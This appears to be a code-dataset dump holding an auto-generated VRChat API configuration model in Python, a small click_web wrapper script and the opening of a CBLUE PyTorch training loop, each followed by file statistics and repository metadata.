white_listed_asset_urls, world_update_period, youtubedl_hash, youtubedl_version, *args, **kwargs): # noqa: E501
"""APIConfig - a model defined in OpenAPI
Args:
address (str): VRChat's office address
announcements ([PublicAnnouncement]): Public Announcements
api_key (str): apiKey to be used for all other requests
build_version_tag (str): Build tag of the API server
client_api_key (str): apiKey to be used for all other requests
contact_email (str): VRChat's contact email
copyright_email (str): VRChat's copyright-issues-related email
current_tos_version (int): Current version number of the Terms of Service
default_avatar (AvatarID):
deployment_group (DeploymentGroup):
dev_app_version_standalone (str): Version number for game development build
dev_download_link_windows (str): Developer Download link
dev_sdk_url (str): Link to download the development SDK, use downloadUrls instead
dev_sdk_version (str): Version of the development SDK
dev_server_version_standalone (str): Version number for server development build
dis_countdown (datetime): Unknown, \"dis\" maybe for disconnect?
download_link_windows (str): Download link for game on the Oculus Rift website.
download_urls (DownloadURLList):
dynamic_world_rows ([DynamicContentRow]): Array of DynamicWorldRow objects, used by the game to display the list of world rows
events (APIEventConfig):
gear_demo_room_id (str): Unknown
home_world_id (WorldID):
hub_world_id (WorldID):
jobs_email (str): VRChat's job application email
message_of_the_day (str): MOTD
moderation_email (str): VRChat's moderation related email
moderation_query_period (int): Unknown
not_allowed_to_select_avatar_in_private_world_message (str): Used in-game to notify a user they aren't allowed to select avatars in private worlds
plugin (str): Extra [plugin](https://doc.photonengine.com/en-us/server/current/plugins/manual) to run in each instance
release_app_version_standalone (str): Version number for game release build
release_sdk_url (str): Link to download the release SDK
release_sdk_version (str): Version of the release SDK
release_server_version_standalone (str): Version number for server release build
sdk_developer_faq_url (str): Link to the developer FAQ
sdk_discord_url (str): Link to the official VRChat Discord
sdk_not_allowed_to_publish_message (str): Used in the SDK to notify a user they aren't allowed to upload avatars/worlds yet
sdk_unity_version (str): Unity version supported by the SDK
server_name (str): Server name of the API server currently responding
support_email (str): VRChat's support email
time_out_world_id (WorldID):
tutorial_world_id (WorldID):
update_rate_ms_maximum (int): Unknown
update_rate_ms_minimum (int): Unknown
update_rate_ms_normal (int): Unknown
update_rate_ms_udon_manual (int): Unknown
upload_analysis_percent (int): Unknown
url_list ([str]): List of allowed URLs that bypass the \"Allow untrusted URL's\" setting in-game
user_update_period (int): Unknown
user_verification_delay (int): Unknown
user_verification_retry (int): Unknown
user_verification_timeout (int): Unknown
vive_windows_url (str): Download link for game on the Steam website.
white_listed_asset_urls ([str]): List of allowed URLs that are allowed to host avatar assets
world_update_period (int): Unknown
youtubedl_hash (str): Currently used youtube-dl.exe hash in SHA-256-delimited format
youtubedl_version (str): Currently used youtube-dl.exe version
Keyword Args:
voice_enable_degradation (bool): Unknown, probably voice optimization testing. defaults to False # noqa: E501
voice_enable_receiver_limiting (bool): Unknown, probably voice optimization testing. defaults to True # noqa: E501
app_name (str): Game name. defaults to "VrChat" # noqa: E501
client_bps_ceiling (int): Unknown. defaults to 18432 # noqa: E501
client_disconnect_timeout (int): Unknown. defaults to 30000 # noqa: E501
client_reserved_player_bps (int): Unknown. defaults to 7168 # noqa: E501
client_sent_count_allowance (int): Unknown. defaults to 15 # noqa: E501
disable_avatar_copying (bool): Toggles if copying avatars should be disabled. defaults to False # noqa: E501
disable_avatar_gating (bool): Toggles if avatar gating should be disabled. Avatar gating restricts uploading of avatars to people with the `system_avatar_access` Tag or `admin_avatar_access` Tag. defaults to False # noqa: E501
disable_community_labs (bool): Toggles if the Community Labs should be disabled. defaults to False # noqa: E501
disable_community_labs_promotion (bool): Toggles if promotion out of Community Labs should be disabled. defaults to False # noqa: E501
disable_email (bool): Unknown. defaults to False # noqa: E501
disable_event_stream (bool): Toggles if Analytics should be disabled. defaults to False # noqa: E501
disable_feedback_gating (bool): Toggles if feedback gating should be disabled. Feedback gating restricts submission of feedback (reporting a World or User) to people with the `system_feedback_access` Tag. defaults to False # noqa: E501
disable_frontend_builds (bool): Unknown, probably toggles compilation of frontend web builds (an internal flag?). defaults to False # noqa: E501
disable_hello (bool): Unknown. defaults to False # noqa: E501
disable_oculus_subs (bool): Toggles if signing up for Subscriptions in Oculus is disabled or not. defaults to False # noqa: E501
disable_registration (bool): Toggles if new user account registration should be disabled. defaults to False # noqa: E501
disable_steam_networking (bool): Toggles if Steam Networking should be disabled. VRChat these days uses Photon Unity Networking (PUN) instead. defaults to True # noqa: E501
disable_two_factor_auth (bool): Toggles if 2FA should be disabled. defaults to False # noqa: E501
disable_udon (bool): Toggles if Udon should be universally disabled in-game. defaults to False # noqa: E501
disable_upgrade_account (bool): Toggles if account upgrading \"linking with Steam/Oculus\" should be disabled. defaults to False # noqa: E501
homepage_redirect_target (str): Redirect target if you try to open the base API domain in your browser. defaults to "https://hello.vrchat.com" # noqa: E501
use_reliable_udp_for_voice (bool): Unknown. defaults to False # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
voice_enable_degradation = kwargs.get('voice_enable_degradation', False)
voice_enable_receiver_limiting = kwargs.get('voice_enable_receiver_limiting', True)
app_name = kwargs.get('app_name', "VrChat")
client_bps_ceiling = kwargs.get('client_bps_ceiling', 18432)
client_disconnect_timeout = kwargs.get('client_disconnect_timeout', 30000)
client_reserved_player_bps = kwargs.get('client_reserved_player_bps', 7168)
client_sent_count_allowance = kwargs.get('client_sent_count_allowance', 15)
disable_avatar_copying = kwargs.get('disable_avatar_copying', False)
disable_avatar_gating = kwargs.get('disable_avatar_gating', False)
disable_community_labs = kwargs.get('disable_community_labs', False)
disable_community_labs_promotion = kwargs.get('disable_community_labs_promotion', False)
disable_email = kwargs.get('disable_email', False)
disable_event_stream = kwargs.get('disable_event_stream', False)
disable_feedback_gating = kwargs.get('disable_feedback_gating', False)
disable_frontend_builds = kwargs.get('disable_frontend_builds', False)
disable_hello = kwargs.get('disable_hello', False)
disable_oculus_subs = kwargs.get('disable_oculus_subs', False)
disable_registration = kwargs.get('disable_registration', False)
disable_steam_networking = kwargs.get('disable_steam_networking', True)
disable_two_factor_auth = kwargs.get('disable_two_factor_auth', False)
disable_udon = kwargs.get('disable_udon', False)
disable_upgrade_account = kwargs.get('disable_upgrade_account', False)
homepage_redirect_target = kwargs.get('homepage_redirect_target', "https://hello.vrchat.com")
use_reliable_udp_for_voice = kwargs.get('use_reliable_udp_for_voice', False)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.voice_enable_degradation = voice_enable_degradation
self.voice_enable_receiver_limiting = voice_enable_receiver_limiting
self.address = address
self.announcements = announcements
self.api_key = api_key
self.app_name = app_name
self.build_version_tag = build_version_tag
self.client_api_key = client_api_key
self.client_bps_ceiling = client_bps_ceiling
self.client_disconnect_timeout = client_disconnect_timeout
self.client_reserved_player_bps = client_reserved_player_bps
self.client_sent_count_allowance = client_sent_count_allowance
self.contact_email = contact_email
self.copyright_email = copyright_email
self.current_tos_version = current_tos_version
self.default_avatar = default_avatar
self.deployment_group = deployment_group
self.dev_app_version_standalone = dev_app_version_standalone
self.dev_download_link_windows = dev_download_link_windows
self.dev_sdk_url = dev_sdk_url
self.dev_sdk_version = dev_sdk_version
self.dev_server_version_standalone = dev_server_version_standalone
self.dis_countdown = dis_countdown
self.disable_avatar_copying = disable_avatar_copying
self.disable_avatar_gating = disable_avatar_gating
self.disable_community_labs = disable_community_labs
self.disable_community_labs_promotion = disable_community_labs_promotion
self.disable_email = disable_email
self.disable_event_stream = disable_event_stream
self.disable_feedback_gating = disable_feedback_gating
self.disable_frontend_builds = disable_frontend_builds
self.disable_hello = disable_hello
self.disable_oculus_subs = disable_oculus_subs
self.disable_registration = disable_registration
self.disable_steam_networking = disable_steam_networking
self.disable_two_factor_auth = disable_two_factor_auth
self.disable_udon = disable_udon
self.disable_upgrade_account = disable_upgrade_account
self.download_link_windows = download_link_windows
self.download_urls = download_urls
self.dynamic_world_rows = dynamic_world_rows
self.events = events
self.gear_demo_room_id = gear_demo_room_id
self.home_world_id = home_world_id
self.homepage_redirect_target = homepage_redirect_target
self.hub_world_id = hub_world_id
self.jobs_email = jobs_email
self.message_of_the_day = message_of_the_day
self.moderation_email = moderation_email
self.moderation_query_period = moderation_query_period
self.not_allowed_to_select_avatar_in_private_world_message = not_allowed_to_select_avatar_in_private_world_message
self.plugin = plugin
self.release_app_version_standalone = release_app_version_standalone
self.release_sdk_url = release_sdk_url
self.release_sdk_version = release_sdk_version
self.release_server_version_standalone = release_server_version_standalone
self.sdk_developer_faq_url = sdk_developer_faq_url
self.sdk_discord_url = sdk_discord_url
self.sdk_not_allowed_to_publish_message = sdk_not_allowed_to_publish_message
self.sdk_unity_version = sdk_unity_version
self.server_name = server_name
self.support_email = support_email
self.time_out_world_id = time_out_world_id
self.tutorial_world_id = tutorial_world_id
self.update_rate_ms_maximum = update_rate_ms_maximum
self.update_rate_ms_minimum = update_rate_ms_minimum
self.update_rate_ms_normal = update_rate_ms_normal
self.update_rate_ms_udon_manual = update_rate_ms_udon_manual
self.upload_analysis_percent = upload_analysis_percent
self.url_list = url_list
self.use_reliable_udp_for_voice = use_reliable_udp_for_voice
self.user_update_period = user_update_period
self.user_verification_delay = user_verification_delay
self.user_verification_retry = user_verification_retry
self.user_verification_timeout = user_verification_timeout
self.vive_windows_url = vive_windows_url
self.white_listed_asset_urls = white_listed_asset_urls
self.world_update_period = world_update_period
self.youtubedl_hash = youtubedl_hash
self.youtubedl_version = youtubedl_version
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, address, announcements, api_key, build_version_tag, client_api_key, contact_email, copyright_email, current_tos_version, default_avatar, deployment_group, dev_app_version_standalone, dev_download_link_windows, dev_sdk_url, dev_sdk_version, dev_server_version_standalone, dis_countdown, download_link_windows, download_urls, dynamic_world_rows, events, gear_demo_room_id, home_world_id, hub_world_id, jobs_email, message_of_the_day, moderation_email, moderation_query_period, not_allowed_to_select_avatar_in_private_world_message, plugin, release_app_version_standalone, release_sdk_url, release_sdk_version, release_server_version_standalone, sdk_developer_faq_url, sdk_discord_url, sdk_not_allowed_to_publish_message, sdk_unity_version, server_name, support_email, time_out_world_id, tutorial_world_id, update_rate_ms_maximum, update_rate_ms_minimum, update_rate_ms_normal, update_rate_ms_udon_manual, upload_analysis_percent, url_list, user_update_period, user_verification_delay, user_verification_retry, user_verification_timeout, vive_windows_url, white_listed_asset_urls, world_update_period, youtubedl_hash, youtubedl_version, *args, **kwargs): # noqa: E501
"""APIConfig - a model defined in OpenAPI
Args:
address (str): VRChat's office address
announcements ([PublicAnnouncement]): Public Announcements
api_key (str): apiKey to be used for all other requests
build_version_tag (str): Build tag of the API server
client_api_key (str): apiKey to be used for all other requests
contact_email (str): VRChat's contact email
copyright_email (str): VRChat's copyright-issues-related email
current_tos_version (int): Current version number of the Terms of Service
default_avatar (AvatarID):
deployment_group (DeploymentGroup):
dev_app_version_standalone (str): Version number for game development build
dev_download_link_windows (str): Developer Download link
dev_sdk_url (str): Link to download the development SDK, use downloadUrls instead
dev_sdk_version (str): Version of the development SDK
dev_server_version_standalone (str): Version number for server development build
dis_countdown (datetime): Unknown, \"dis\" maybe for disconnect?
download_link_windows (str): Download link for game on the Oculus Rift website.
download_urls (DownloadURLList):
dynamic_world_rows ([DynamicContentRow]): Array of DynamicWorldRow objects, used by the game to display the list of world rows
events (APIEventConfig):
gear_demo_room_id (str): Unknown
home_world_id (WorldID):
hub_world_id (WorldID):
jobs_email (str): VRChat's job application email
message_of_the_day (str): MOTD
moderation_email (str): VRChat's moderation related email
moderation_query_period (int): Unknown
not_allowed_to_select_avatar_in_private_world_message (str): Used in-game to notify a user they aren't allowed to select avatars in private worlds
plugin (str): Extra [plugin](https://doc.photonengine.com/en-us/server/current/plugins/manual) to run in each instance
release_app_version_standalone (str): Version number for game release build
release_sdk_url (str): Link to download the release SDK
release_sdk_version (str): Version of the release SDK
release_server_version_standalone (str): Version number for server release build
sdk_developer_faq_url (str): Link to the developer FAQ
sdk_discord_url (str): Link to the official VRChat Discord
sdk_not_allowed_to_publish_message (str): Used in the SDK to notify a user they aren't allowed to upload avatars/worlds yet
sdk_unity_version (str): Unity version supported by the SDK
server_name (str): Server name of the API server currently responding
support_email (str): VRChat's support email
time_out_world_id (WorldID):
tutorial_world_id (WorldID):
update_rate_ms_maximum (int): Unknown
update_rate_ms_minimum (int): Unknown
update_rate_ms_normal (int): Unknown
update_rate_ms_udon_manual (int): Unknown
upload_analysis_percent (int): Unknown
url_list ([str]): List of allowed URLs that bypass the \"Allow untrusted URL's\" setting in-game
user_update_period (int): Unknown
user_verification_delay (int): Unknown
user_verification_retry (int): Unknown
user_verification_timeout (int): Unknown
vive_windows_url (str): Download link for game on the Steam website.
white_listed_asset_urls ([str]): List of allowed URLs that are allowed to host avatar assets
world_update_period (int): Unknown
youtubedl_hash (str): Currently used youtube-dl.exe hash in SHA-256-delimited format
youtubedl_version (str): Currently used youtube-dl.exe version
Keyword Args:
voice_enable_degradation (bool): Unknown, probably voice optimization testing. defaults to False # noqa: E501
voice_enable_receiver_limiting (bool): Unknown, probably voice optimization testing. defaults to True # noqa: E501
app_name (str): Game name. defaults to "VrChat" # noqa: E501
client_bps_ceiling (int): Unknown. defaults to 18432 # noqa: E501
client_disconnect_timeout (int): Unknown. defaults to 30000 # noqa: E501
client_reserved_player_bps (int): Unknown. defaults to 7168 # noqa: E501
client_sent_count_allowance (int): Unknown. defaults to 15 # noqa: E501
disable_avatar_copying (bool): Toggles if copying avatars should be disabled. defaults to False # noqa: E501
disable_avatar_gating (bool): Toggles if avatar gating should be disabled. Avatar gating restricts uploading of avatars to people with the `system_avatar_access` Tag or `admin_avatar_access` Tag. defaults to False # noqa: E501
disable_community_labs (bool): Toggles if the Community Labs should be disabled. defaults to False # noqa: E501
disable_community_labs_promotion (bool): Toggles if promotion out of Community Labs should be disabled. defaults to False # noqa: E501
disable_email (bool): Unknown. defaults to False # noqa: E501
disable_event_stream (bool): Toggles if Analytics should be disabled. defaults to False # noqa: E501
disable_feedback_gating (bool): Toggles if feedback gating should be disabled. Feedback gating restricts submission of feedback (reporting a World or User) to people with the `system_feedback_access` Tag. defaults to False # noqa: E501
disable_frontend_builds (bool): Unknown, probably toggles compilation of frontend web builds (an internal flag?). defaults to False # noqa: E501
disable_hello (bool): Unknown. defaults to False # noqa: E501
disable_oculus_subs (bool): Toggles if signing up for Subscriptions in Oculus is disabled or not. defaults to False # noqa: E501
disable_registration (bool): Toggles if new user account registration should be disabled. defaults to False # noqa: E501
disable_steam_networking (bool): Toggles if Steam Networking should be disabled. VRChat these days uses Photon Unity Networking (PUN) instead. defaults to True # noqa: E501
disable_two_factor_auth (bool): Toggles if 2FA should be disabled. defaults to False # noqa: E501
disable_udon (bool): Toggles if Udon should be universally disabled in-game. defaults to False # noqa: E501
disable_upgrade_account (bool): Toggles if account upgrading \"linking with Steam/Oculus\" should be disabled. defaults to False # noqa: E501
homepage_redirect_target (str): Redirect target if you try to open the base API domain in your browser. defaults to "https://hello.vrchat.com" # noqa: E501
use_reliable_udp_for_voice (bool): Unknown. defaults to False # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
voice_enable_degradation = kwargs.get('voice_enable_degradation', False)
voice_enable_receiver_limiting = kwargs.get('voice_enable_receiver_limiting', True)
app_name = kwargs.get('app_name', "VrChat")
client_bps_ceiling = kwargs.get('client_bps_ceiling', 18432)
client_disconnect_timeout = kwargs.get('client_disconnect_timeout', 30000)
client_reserved_player_bps = kwargs.get('client_reserved_player_bps', 7168)
client_sent_count_allowance = kwargs.get('client_sent_count_allowance', 15)
disable_avatar_copying = kwargs.get('disable_avatar_copying', False)
disable_avatar_gating = kwargs.get('disable_avatar_gating', False)
disable_community_labs = kwargs.get('disable_community_labs', False)
disable_community_labs_promotion = kwargs.get('disable_community_labs_promotion', False)
disable_email = kwargs.get('disable_email', False)
disable_event_stream = kwargs.get('disable_event_stream', False)
disable_feedback_gating = kwargs.get('disable_feedback_gating', False)
disable_frontend_builds = kwargs.get('disable_frontend_builds', False)
disable_hello = kwargs.get('disable_hello', False)
disable_oculus_subs = kwargs.get('disable_oculus_subs', False)
disable_registration = kwargs.get('disable_registration', False)
disable_steam_networking = kwargs.get('disable_steam_networking', True)
disable_two_factor_auth = kwargs.get('disable_two_factor_auth', False)
disable_udon = kwargs.get('disable_udon', False)
disable_upgrade_account = kwargs.get('disable_upgrade_account', False)
homepage_redirect_target = kwargs.get('homepage_redirect_target', "https://hello.vrchat.com")
use_reliable_udp_for_voice = kwargs.get('use_reliable_udp_for_voice', False)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.voice_enable_degradation = voice_enable_degradation
self.voice_enable_receiver_limiting = voice_enable_receiver_limiting
self.address = address
self.announcements = announcements
self.api_key = api_key
self.app_name = app_name
self.build_version_tag = build_version_tag
self.client_api_key = client_api_key
self.client_bps_ceiling = client_bps_ceiling
self.client_disconnect_timeout = client_disconnect_timeout
self.client_reserved_player_bps = client_reserved_player_bps
self.client_sent_count_allowance = client_sent_count_allowance
self.contact_email = contact_email
self.copyright_email = copyright_email
self.current_tos_version = current_tos_version
self.default_avatar = default_avatar
self.deployment_group = deployment_group
self.dev_app_version_standalone = dev_app_version_standalone
self.dev_download_link_windows = dev_download_link_windows
self.dev_sdk_url = dev_sdk_url
self.dev_sdk_version = dev_sdk_version
self.dev_server_version_standalone = dev_server_version_standalone
self.dis_countdown = dis_countdown
self.disable_avatar_copying = disable_avatar_copying
self.disable_avatar_gating = disable_avatar_gating
self.disable_community_labs = disable_community_labs
self.disable_community_labs_promotion = disable_community_labs_promotion
self.disable_email = disable_email
self.disable_event_stream = disable_event_stream
self.disable_feedback_gating = disable_feedback_gating
self.disable_frontend_builds = disable_frontend_builds
self.disable_hello = disable_hello
self.disable_oculus_subs = disable_oculus_subs
self.disable_registration = disable_registration
self.disable_steam_networking = disable_steam_networking
self.disable_two_factor_auth = disable_two_factor_auth
self.disable_udon = disable_udon
self.disable_upgrade_account = disable_upgrade_account
self.download_link_windows = download_link_windows
self.download_urls = download_urls
self.dynamic_world_rows = dynamic_world_rows
self.events = events
self.gear_demo_room_id = gear_demo_room_id
self.home_world_id = home_world_id
self.homepage_redirect_target = homepage_redirect_target
self.hub_world_id = hub_world_id
self.jobs_email = jobs_email
self.message_of_the_day = message_of_the_day
self.moderation_email = moderation_email
self.moderation_query_period = moderation_query_period
self.not_allowed_to_select_avatar_in_private_world_message = not_allowed_to_select_avatar_in_private_world_message
self.plugin = plugin
self.release_app_version_standalone = release_app_version_standalone
self.release_sdk_url = release_sdk_url
self.release_sdk_version = release_sdk_version
self.release_server_version_standalone = release_server_version_standalone
self.sdk_developer_faq_url = sdk_developer_faq_url
self.sdk_discord_url = sdk_discord_url
self.sdk_not_allowed_to_publish_message = sdk_not_allowed_to_publish_message
self.sdk_unity_version = sdk_unity_version
self.server_name = server_name
self.support_email = support_email
self.time_out_world_id = time_out_world_id
self.tutorial_world_id = tutorial_world_id
self.update_rate_ms_maximum = update_rate_ms_maximum
self.update_rate_ms_minimum = update_rate_ms_minimum
self.update_rate_ms_normal = update_rate_ms_normal
self.update_rate_ms_udon_manual = update_rate_ms_udon_manual
self.upload_analysis_percent = upload_analysis_percent
self.url_list = url_list
self.use_reliable_udp_for_voice = use_reliable_udp_for_voice
self.user_update_period = user_update_period
self.user_verification_delay = user_verification_delay
self.user_verification_retry = user_verification_retry
self.user_verification_timeout = user_verification_timeout
self.vive_windows_url = vive_windows_url
self.white_listed_asset_urls = white_listed_asset_urls
self.world_update_period = world_update_period
self.youtubedl_hash = youtubedl_hash
self.youtubedl_version = youtubedl_version
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| 58.468132
| 1,197
| 0.662858
| 6,219
| 53,206
| 5.321917
| 0.085062
| 0.051002
| 0.027193
| 0.01837
| 0.848838
| 0.7969
| 0.7504
| 0.74043
| 0.737167
| 0.735807
| 0
| 0.019148
| 0.260892
| 53,206
| 909
| 1,198
| 58.532453
| 0.822479
| 0.378284
| 0
| 0.5
| 1
| 0
| 0.233748
| 0.117457
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009934
| false
| 0.003311
| 0.024834
| 0.001656
| 0.054636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 73ce3536add53322859b0781ef6fbceac84102e0
| 146
| py
| Python
| demo_scripts/app.py
| groverpr/aws-fraud-detector-samples
| a1f178ee4389416b93750abb1db622f74a6b3cb4
| [ "MIT-0" ] | null | null | null
| demo_scripts/app.py
| groverpr/aws-fraud-detector-samples
| a1f178ee4389416b93750abb1db622f74a6b3cb4
| [ "MIT-0" ] | null | null | null
| demo_scripts/app.py
| groverpr/aws-fraud-detector-samples
| a1f178ee4389416b93750abb1db622f74a6b3cb4
| [ "MIT-0" ] | 1
| 2022-01-25T20:48:22.000Z
| 2022-01-25T20:48:22.000Z
|
from click_web import create_click_web_app
import create_afd_resources
app = create_click_web_app(create_afd_resources, create_afd_resources.cli)
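# Editor's note (assumption, based on the click-web project): create_click_web_app
# wraps the click CLI defined in create_afd_resources.cli as a Flask WSGI app, so it
# can be served with the usual Flask tooling, e.g. `FLASK_APP=app flask run` or a
# WSGI server such as gunicorn (`gunicorn app:app`).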
| 36.5
| 74
| 0.89726
| 24
| 146
| 4.916667
| 0.375
| 0.20339
| 0.457627
| 0.288136
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068493
| 146
| 4
| 74
| 36.5
| 0.867647
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 7
| fb5bcee324d2c1b4afd51fd4cb18ee1f4c93732e
| 96,345
| py
| Python
| cblue/trainer/train.py
| dfhby0/CBLUE
| 36bdb52f17c4379d4a5f8b407890ba294017b5e2
| [ "Apache-2.0" ] | 293
| 2021-06-07T06:04:37.000Z
| 2022-03-28T09:38:28.000Z
| cblue/trainer/train.py
| dfhby0/CBLUE
| 36bdb52f17c4379d4a5f8b407890ba294017b5e2
| [ "Apache-2.0" ] | 6
| 2021-06-11T09:50:15.000Z
| 2022-03-18T07:33:56.000Z
| cblue/trainer/train.py
| dfhby0/CBLUE
| 36bdb52f17c4379d4a5f8b407890ba294017b5e2
| [ "Apache-2.0" ] | 61
| 2021-06-07T06:38:42.000Z
| 2022-03-30T07:16:46.000Z
|
import os
import json
import numpy as np
import torch
import torch.nn as nn
from transformers import AdamW, get_linear_schedule_with_warmup
from torch.utils.data import Dataset, DataLoader
from cblue.utils import seed_everything, ProgressBar, TokenRematch
from cblue.metrics import sts_metric, qic_metric, qqr_metric, qtr_metric, \
ctc_metric, ee_metric, er_metric, re_metric, cdn_cls_metric, cdn_num_metric
from cblue.metrics import sts_commit_prediction, qic_commit_prediction, qtr_commit_prediction, \
qqr_commit_prediction, ctc_commit_prediction, ee_commit_prediction, cdn_commit_prediction
from cblue.models import convert_examples_to_features, save_zen_model
class Trainer(object):
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
self.args = args
self.model = model
self.data_processor = data_processor
self.tokenizer = tokenizer
if train_dataset is not None and isinstance(train_dataset, Dataset):
self.train_dataset = train_dataset
if eval_dataset is not None and isinstance(eval_dataset, Dataset):
self.eval_dataset = eval_dataset
self.logger = logger
self.model_class = model_class
self.ngram_dict = ngram_dict
def train(self):
args = self.args
logger = self.logger
model = self.model
model.to(args.device)
train_dataloader = self.get_train_dataloader()
num_training_steps = len(train_dataloader) * args.epochs
num_warmup_steps = num_training_steps * args.warmup_proportion
num_examples = len(train_dataloader.dataset)
no_decay = ['bias', 'LayerNorm.weight']
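# Standard AdamW setup: bias and LayerNorm weights are excluded from weight decay;
# all other parameters use args.weight_decay.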
optimizer_grouped_parameters = [
{'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
'weight_decay': self.args.weight_decay},
{'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],
'weight_decay': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=num_warmup_steps,
num_training_steps=num_training_steps)
if args.task_name in ['qic', 'qqr', 'qtr', 'sts']:
seed_everything(args.seed)
model.zero_grad()
logger.info("***** Running training *****")
logger.info("Num samples %d", num_examples)
logger.info("Num epochs %d", args.epochs)
logger.info("Num training steps %d", num_training_steps)
logger.info("Num warmup steps %d", num_warmup_steps)
global_step = 0
best_step = None
best_score = .0
cnt_patience = 0
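# best_score / best_step track the best evaluation result so far; cnt_patience
# counts evaluations without improvement and stops training early once it
# reaches args.earlystop_patience.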
for i in range(args.epochs):
pbar = ProgressBar(n_total=len(train_dataloader), desc='Training')
for step, item in enumerate(train_dataloader):
loss = self.training_step(model, item)
pbar(step, {'loss': loss.item()})
if args.max_grad_norm:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step()
if args.task_name in ['qic', 'qqr', 'qtr', 'sts']:
model.zero_grad()
else:
optimizer.zero_grad()
global_step += 1
if args.logging_steps > 0 and global_step % args.logging_steps == 0:
print("")
score = self.evaluate(model)
if score > best_score:
best_score = score
best_step = global_step
cnt_patience = 0
self._save_checkpoint(model, global_step)
else:
cnt_patience += 1
self.logger.info("Earlystopper counter: %s out of %s", cnt_patience, args.earlystop_patience)
if cnt_patience >= self.args.earlystop_patience:
break
if cnt_patience >= args.earlystop_patience:
break
logger.info("Training Stop! The best step %s: %s", best_step, best_score)
if args.device == 'cuda':
torch.cuda.empty_cache()
self._save_best_checkpoint(best_step=best_step)
return global_step, best_step
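# evaluate, _save_checkpoint, _save_best_checkpoint and training_step are
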